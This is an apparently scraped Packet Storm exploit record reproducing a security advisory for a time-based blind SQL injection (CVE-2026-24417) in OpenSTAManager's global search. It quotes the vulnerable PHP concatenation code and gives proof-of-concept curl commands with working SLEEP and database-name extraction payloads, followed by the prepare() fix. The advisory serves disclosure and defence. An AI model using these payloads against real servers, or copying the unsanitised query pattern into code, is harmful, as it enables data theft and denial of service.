{“lastseen”:”2026-04-13T15:51:21″,”description”:”OpenSTAManager versions 2.9.8 and below suffer from a remote time-based SQL injection vulnerability in the search functionality that can lead to a denial of service condition…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \/ Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:218743″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24417″],”sourceData”:”# CVE-2026-24417: OpenSTAManager has a Time-Based Blind SQL Injection with Amplified Denial of Service\\n \\n ## Overview\\n \\n | Field | Details |\\n |—|—|\\n | **CVE ID** | [CVE-2026-24417](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-24417) |\\n | **Severity** | HIGH |\\n | **Advisory** | [View Advisory](https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-4hc4-8599-xh2h) |\\n | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n \\n ## Affected Products\\n \\n – **devcode-it\/openstamanager** (versions: \\u003c 2.9.8)\\n \\n \\n ## CWE Classification\\n \\n – CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)\\n \\n ## Details\\n \\n ### Summary\\n \\n Critical Time-Based Blind SQL Injection vulnerability affecting **multiple search modules** in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with **amplified execution** across 10+ modules.\\n \\n **Status:** \u2705 Confirmed and tested on live instance (v2.9.8)\\n **Vulnerable Parameter:** `term` (GET)\\n **Affected Endpoint:** `\/ajax_search.php`\\n **Affected Modules:** Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi\\n \\n ### Details\\n \\n OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the `term` parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.\\n \\n **Vulnerability Chain:**\\n \\n 1. **Entry Point:** `\/ajax_search.php` (Line 30-31)\\n “`php\\n $term = get(‘term’);\\n $term = str_replace(‘\/’, ‘\\\\\\\\\/’, $term);\\n “`\\n The `$term` parameter undergoes minimal sanitization (only forward slash replacement).\\n \\n 2. **Distribution:** `\/src\/AJAX.php::search()` (Line 159-161)\\n “`php\\n $files = self::find(‘ajax\/search.php’);\\n array_unshift($files, base_dir().’\/ajax_search.php’);\\n foreach ($files as $file) {\\n $module_results = self::getSearchResults($file, $term);\\n “`\\n The unsanitized `$term` is passed to all module-specific search handlers.\\n \\n 3. **Execution:** `\/src\/AJAX.php::getSearchResults()` (Line 373)\\n “`php\\n require $file;\\n “`\\n Each module’s search.php file is included with `$term` variable in scope.\\n \\n 4. **Vulnerable SQL Queries:** Multiple modules directly concatenate `$term` without `prepare()`\\n \\n **All Affected Files (10+ vulnerable instances):**\\n \\n 1. **`\/modules\/articoli\/ajax\/search.php` – Line 51** (PRIMARY EXAMPLE)\\n “`php\\n foreach ($fields as $name =\\u003e $value) {\\n $query .= ‘ OR ‘.$value.’ LIKE \\”%’.$term.’%\\”‘;\\n }\\n $rs = $dbo-\\u003efetchArray($query);\\n “`\\n **Impact:** Direct concatenation without `prepare()`, allows full SQL injection.\\n \\n 2. **`\/modules\/ordini\/ajax\/search.php` – Line 43, 47**\\n “`php\\n $query .= ‘ OR ‘.$value.’ LIKE \\”%’.$term.’%\\”‘;\\n $query .= ‘… WHERE `mg_articoli`.`codice` LIKE \\”%’.$term.’%\\” OR `mg_articoli_lang`.`title` LIKE \\”%’.$term.’%\\”‘;\\n “`\\n \\n 3. **`\/modules\/ddt\/ajax\/search.php` – Line 43, 47**\\n “`php\\n $query .= ‘ OR ‘.$value.’ LIKE \\”%’.$term.’%\\”‘;\\n “`\\n \\n 4. **`\/modules\/fatture\/ajax\/search.php` – Line 45, 49**\\n “`php\\n $query .= ‘ OR ‘.$value.’ LIKE \\”%’.$term.’%\\”‘;\\n “`\\n \\n 5. **`\/modules\/preventivi\/ajax\/search.php` – Line 45, 49**\\n “`php\\n $query .= ‘ OR ‘.$value.’ LIKE \\”%’.$term.’%\\”‘;\\n “`\\n \\n 6. **`\/modules\/anagrafiche\/ajax\/search.php` – Line 62, 107, 162**\\n “`php\\n $query .= ‘ OR ‘.$value.’ LIKE \\”%’.$term.’%\\”‘;\\n “`\\n \\n 7. **`\/modules\/impianti\/ajax\/search.php` – Line 46**\\n “`php\\n $query .= ‘ OR ‘.$value.’ LIKE \\”%’.$term.’%\\”‘;\\n “`\\n \\n **Properly Sanitized (NOT vulnerable):**\\n – `\/modules\/contratti\/ajax\/search.php` – Uses `prepare()` correctly\\n – `\/modules\/automezzi\/ajax\/search.php` – Uses `prepare()` correctly\\n \\n **Note:** The vulnerability has **amplified execution** – a single malicious request triggers SQL injection across ALL vulnerable modules simultaneously, causing time-based attacks to execute 10+ times per request, multiplying the delay and leading to **504 Gateway Time-out** errors as observed on the live demo instance.\\n \\n \\u003cimg width=\\”1899\\” height=\\”349\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/a6cc5a75-0f4e-4f49-a750-7ae72a363bbe\\” \/\\u003e\\n \\n ### PoC\\n \\n **Step 1: Login**\\n “`bash\\n curl -c \/tmp\/cookies.txt -X POST ‘http:\/\/localhost:8081\/index.php?op=login’ \\\\\\n -d ‘username=admin\\u0026password=admin’\\n “`\\n \\n **Step 2: Verify Vulnerability (Time-Based SLEEP)**\\n “`bash\\n # Test with SLEEP(1) – should take ~85+ seconds due to amplified execution\\n time curl -s -b \/tmp\/cookies.txt \\\\\\n ‘http:\/\/localhost:8081\/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22’\\n # Result: real 72.29s\\n \\n # Test with SLEEP(0) – should be fast\\n time curl -s -b \/tmp\/cookies.txt \\\\\\n ‘http:\/\/localhost:8081\/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22’\\n # Result: real 0.30s\\n “`\\n \\n \\u003cimg width=\\”727\\” height=\\”319\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/6022de5e-de91-4ebb-b02a-30358c31d96d\\” \/\\u003e\\n \\n \\n **Step 3: Data Extraction – Database Name**\\n “`bash\\n # Extract first character of database name (expected: ‘o’ from ‘openstamanager’)\\n time curl -s -b \/tmp\/cookies.txt \\\\\\n \\”http:\/\/localhost:8081\/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221\\” \\\\\\n \\u003e \/dev\/null\\n # Result: real 170.32s\\n \\n # Test with wrong character ‘x’ – should be fast\\n time curl -s -b \/tmp\/cookies.txt \\\\\\n \\”http:\/\/localhost:8081\/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221\\” \\\\\\n \\u003e \/dev\/null\\n # Result: real 0m0.30s\\n “`\\n \\n \\u003cimg width=\\”1364\\” height=\\”349\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/a1d8a7d8-bb1a-49cd-8400-136ae5e359f1\\” \/\\u003e\\n \\n \\n ### Impact\\n \\n **Affected Users:** All authenticated users with access to the global search functionality.\\n \\n – Complete database exfiltration including customer PII, financial records, business secrets\\n – Extraction of password hashes for offline cracking\\n – Amplified time-based attacks consume 85x server resources per request\\n \\n **Recommended Fix:**\\n \\n Replace all instances of direct `$term` concatenation with `prepare()`:\\n \\n **BEFORE (Vulnerable):**\\n “`php\\n $query .= ‘ OR ‘.$value.’ LIKE \\”%’.$term.’%\\”‘;\\n “`\\n \\n **AFTER (Fixed):**\\n “`php\\n $query .= ‘ OR ‘.$value.’ LIKE ‘.prepare(‘%’.$term.’%’);\\n “`\\n \\n **Apply this fix to ALL affected files:**\\n 1. `\/modules\/articoli\/ajax\/search.php` – Line 51\\n 2. `\/modules\/ordini\/ajax\/search.php` – Lines 43, 47, 79\\n 3. `\/modules\/ddt\/ajax\/search.php` – Lines 43, 47, 83\\n 4. `\/modules\/fatture\/ajax\/search.php` – Lines 45, 49, 85\\n 5. `\/modules\/preventivi\/ajax\/search.php` – Lines 45, 49, 83\\n 6. `\/modules\/anagrafiche\/ajax\/search.php` – Lines 62, 107, 162\\n 7. `\/modules\/impianti\/ajax\/search.php` – Line 46\\n \\n ## References\\n \\n – https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-4hc4-8599-xh2h\\n – https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-24417\\n – https:\/\/github.com\/advisories\/GHSA-4hc4-8599-xh2h\\n \\n \\n ## Disclaimer\\n \\n This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.”,”sourceHref”:”https:\/\/packetstorm.news\/download\/218743″,”cvss”:{“score”:8.7,”severity”:”HIGH”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/218743\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-13T15:51:21″,”description”:”OpenSTAManager versions 2.9.8 and below suffer from a remote time-based SQL injection vulnerability in the search functionality that can lead to a denial of service…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-46308","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n